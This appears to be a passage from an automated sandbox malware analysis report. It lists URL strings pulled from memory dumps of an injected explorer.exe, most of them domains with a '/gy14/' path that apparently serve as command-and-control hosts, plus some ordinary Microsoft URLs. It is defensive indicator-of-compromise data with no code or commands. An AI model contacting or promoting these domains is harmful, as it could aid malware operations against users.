              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.123bu6.shopReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.com/gy14/www.venitro.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.883831.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.com/gy14/www.sgyy3ej2dgwesb5.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ampsportss.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.com/gy14/www.mrbmed.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.artbydianayorktownva.comReferer:
              Source: explorer.exe, 00000002.00000000.2073710031.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.budgetnurseries.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.budgetnurseries.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.budgetnurseries.com/gy14/www.mtdiyx.xyz
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.budgetnurseries.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.com/gy14/www.twinklethrive.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.elbt-ag.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.com/gy14/www.whatsapp1.autos
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.elbt-ag.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyzReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.online
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.online/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.online/gy14/www.truedatalab.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.roelofsen.onlineReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sgyy3ej2dgwesb5.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sgyy3ej2dgwesb5.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sgyy3ej2dgwesb5.com/gy14/www.883831.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.sgyy3ej2dgwesb5.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soulheroes.online
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soulheroes.online/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soulheroes.online/gy14/www.roelofsen.online
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.soulheroes.onlineReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.com/gy14/www.soulheroes.online
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.theanhedonia.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.com/gy14/www.budgetnurseries.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.truedatalab.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinklethrive.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinklethrive.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinklethrive.com/gy14/www.ampsportss.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.twinklethrive.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.com/gy14/www.artbydianayorktownva.com
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.venitro.comReferer:
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatsapp1.autos
              Source: explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatsapp1.autos/gy14/
              Source: explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.whatsapp1.autosReferer:
              Source: explorer.exe, 00000002.00000000.2066913018.00000000099AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
              Source: explorer.exe, 00000002.00000000.2073710031.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3309996442.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
              Source: explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/I
              Source: explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
